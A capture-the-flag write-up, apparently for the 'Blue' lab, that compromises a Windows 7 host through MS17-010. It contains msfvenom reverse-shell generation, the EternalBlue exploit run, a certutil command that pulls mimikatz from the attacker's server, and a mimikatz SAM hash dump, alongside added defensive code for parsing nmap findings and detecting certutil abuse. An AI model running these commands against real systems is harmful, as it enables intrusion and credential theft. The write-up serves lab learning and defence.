1 Scanning
You can tell from the room name alone that this should be the Blue (EternalBlue) vulnerability.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is runni
A vulnerability scan with nmap confirms it:
C:\root> nmap -p 139,445 --script vuln 10.10.98.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 06:49 EDT
Nmap scan report for 10.10.98.210
Host is up (0.26s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 26.52 seconds
C:\root>
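The useful part of that scan is the single script block whose State is VULNERABLE. When a scan covers more than one host it is worth pulling those blocks out mechanically so they can be handed to whoever does the patching. The following is an added example, not part of the original writeup or of nmap; it parses nmap's normal (non-XML) output and returns one finding per host and script that reports State: VULNERABLE (or a bare "true" on a one-line script result), together with the CVE ids from the IDs line. The sample scan text is constructed to mirror the output above.

```python
import re

# Constructed sample modelled on the nmap --script vuln output shown above
# (indentation as nmap prints it; not captured from the page's own run).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.98.210
Host is up (0.26s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_
Nmap done: 1 IP address (1 host up) scanned in 26.52 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# A script result line: "|_name: value" (one-liner) or "| name:" (block start).
# Script names are lower-case words joined by hyphens, which keeps URLs such as
# "|_ https://..." from being mistaken for a script.
SCRIPT_RE = re.compile(r"^\|[_ ] ?(?P<name>[a-z0-9]+(?:-[a-z0-9]+)+):\s*(?P<value>.*)$")
STATE_RE = re.compile(r"^\|\s+State:\s*(\S+)")
IDS_RE = re.compile(r"^\|\s+IDs:\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_vuln_scan(text):
    """Return a list of dicts (host, script, state, cves) for every script
    result that reports a vulnerable state."""
    findings = []
    host = None
    current = None  # the multi-line script block currently being read
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, current = m.group(1), None
            continue
        if not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            name, value = m.group("name"), m.group("value").strip()
            if value == "":  # start of a multi-line block such as smb-vuln-ms17-010
                current = {"host": host, "script": name, "state": None, "cves": []}
                findings.append(current)
            else:  # one-liner: only a literal "true" counts as vulnerable
                current = None
                if value.lower() == "true":
                    findings.append({"host": host, "script": name,
                                     "state": "VULNERABLE", "cves": []})
            continue
        if current is None:
            continue
        m = STATE_RE.match(line)
        if m:
            current["state"] = m.group(1)
            continue
        m = IDS_RE.match(line)
        if m:
            current["cves"] = CVE_RE.findall(m.group(1))
    return [f for f in findings if f["state"] == "VULNERABLE"]


def patch_list(findings):
    """One line per finding, ready to paste into a ticket."""
    return ["%s  %s  %s" % (f["host"], f["script"], ",".join(f["cves"]) or "-")
            for f in findings]


if __name__ == "__main__":
    for row in patch_list(parse_vuln_scan(SAMPLE_NMAP)):
        print(row)
```

Results such as NT_STATUS_ACCESS_DENIED or false are deliberately ignored: they mean the check could not run or was negative, not that the host is safe, so an unauthenticated scan that returns ACCESS_DENIED everywhere still needs a credentialed follow-up.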
2 Exploiting Blue
https://github.com/3ndG4me/AutoBlue-MS17-010
A quick check confirms the target is Windows 7:
C:\root\exp\AutoBlue-MS17-010-master> python eternal_checker.py 10.10.98.210
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done
C:\root\exp\AutoBlue-MS17-010-master>
Generate the shellcode by following the prompts; to avoid Metasploit, choose 1 and 1.
C:\root\exp\AutoBlue-MS17-010-master\shellcode> ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.9.23.70
LPORT you want x64 to listen on:
4444
LPORT you want x86 to listen on:
443
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.9.23.70 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.9.23.70 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Run the exploit, passing the "all" shellcode file:
C:\root\exp\AutoBlue-MS17-010-master> python eternalblue_exploit7.py 10.10.47.149 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
C:\root\exp\AutoBlue-MS17-010-master>
The connection arrives on the port configured for x64, and we get SYSTEM. If it does not work, reboot the target and try again a few times; this exploit is somewhat unreliable and can crash the machine.
C:\root> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.9.23.70] from (UNKNOWN) [10.10.47.149] 49169
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
3 Dumping hashes
The room also asks for the hashes and so on.
Transfer mimikatz onto the box. Kali 2020 ships it; find it with locate mimikatz. Since the target is not x86, use /usr/share/responder/tools/MultiRelay/bin/mimikatz.exe. Start a local HTTP server with python -m SimpleHTTPServer 80, then, adjusting for your own directory layout, pull the file across with certutil:
C:\Windows\system32>certutil -urlcache -split -f http://10.9.23.70/mimikatz.exe mimikatz.exe
certutil -urlcache -split -f http://10.9.23.70/mimikatz.exe mimikatz.exe
**** Online ****
000000 ...
0baa00
CertUtil: -URLCache command completed successfully.
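That certutil -urlcache -split -f download is exactly the kind of living-off-the-land command a defender should be alerting on, since certutil has no business fetching executables from an arbitrary web server. The following is an added example, not part of the original writeup: it runs a simple detection over constructed process-creation log lines (Sysmon Event ID 1 / Security 4688 style, in a made-up key=value layout) and flags certutil invocations that use -urlcache, -decode or -encode together with the URL involved. The log format, hostnames and the benign lines are assumptions; the suspicious command line mirrors the one used above.

```python
import re

# Constructed process-creation events in a made-up key=value format; the first
# line mirrors the certutil download performed above, the others are benign.
SAMPLE_PROCESS_LOGS = [
    r'2020-05-25T10:49:01 host=JON-PC user=NT AUTHORITY\SYSTEM parent=cmd.exe '
    r'image=C:\Windows\System32\certutil.exe '
    r'cmdline="certutil -urlcache -split -f http://10.9.23.70/mimikatz.exe mimikatz.exe"',
    r'2020-05-25T10:49:05 host=JON-PC user=JON-PC\Jon parent=explorer.exe '
    r'image=C:\Windows\System32\certutil.exe cmdline="certutil -dump C:\Users\Jon\cert.cer"',
    r'2020-05-25T10:49:09 host=JON-PC user=JON-PC\Jon parent=explorer.exe '
    r'image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"',
]

LOG_RE = re.compile(
    r'^(?P<time>\S+) host=(?P<host>\S+) user=(?P<user>.+?) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"$'
)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# certutil switches that are rarely legitimate outside PKI administration:
# -urlcache fetches a remote file, -decode/-encode turn base64 blobs into
# binaries and back (classic dropper tricks). All three are real switches.
SUSPICIOUS_SWITCHES = {"-urlcache", "-decode", "-encode"}


def detect_certutil_abuse(lines):
    """Return one alert dict per certutil invocation using a suspicious switch."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        ev = m.groupdict()
        image_name = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image_name != "certutil.exe":
            continue
        switches = {tok.lower() for tok in ev["cmdline"].split() if tok.startswith("-")}
        hits = sorted(switches & SUSPICIOUS_SWITCHES)
        if not hits:
            continue
        url = URL_RE.search(ev["cmdline"])
        alerts.append({
            "time": ev["time"], "host": ev["host"], "user": ev["user"],
            "parent": ev["parent"], "switches": hits,
            "url": url.group(0) if url else None,
            "cmdline": ev["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    for a in detect_certutil_abuse(SAMPLE_PROCESS_LOGS):
        print("ALERT %(time)s %(host)s %(user)s parent=%(parent)s "
              "switches=%(switches)s url=%(url)s" % a)
```

Note the context that makes the first line stand out even without the URL: certutil launched from cmd.exe running as NT AUTHORITY\SYSTEM, which is precisely what a post-exploitation shell looks like, whereas the -dump call from an interactive user session is ordinary use.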
Run it. The SAM is where the hashes are stored; enter the command and the extracted hashes appear. Crack them or go find the flags, and this machine is done.
C:\Windows\system32>C:\Windows\system32\mimikatz.exe
C:\Windows\system32\mimikatz.exe
.#####. mimikatz 2.1.1 (x64) built on Mar 29 2017 23:20:11
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 21 modules * * */
mimikatz # lsadump::sam
Domain : JON-PC
SysKey : 55bd17830e678f18a3110daf2c17d4c7
Local SID : S-1-5-21-2633577515-2458672280-487782642
SAMKey : c74ee832c5b6f4030dbbc7b51a011b1e
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000003e8 (1000)
User : Jon
LM :
NTLM : ffb43f0de35be4d9917ac0cc8ad57f8d
mimikatz #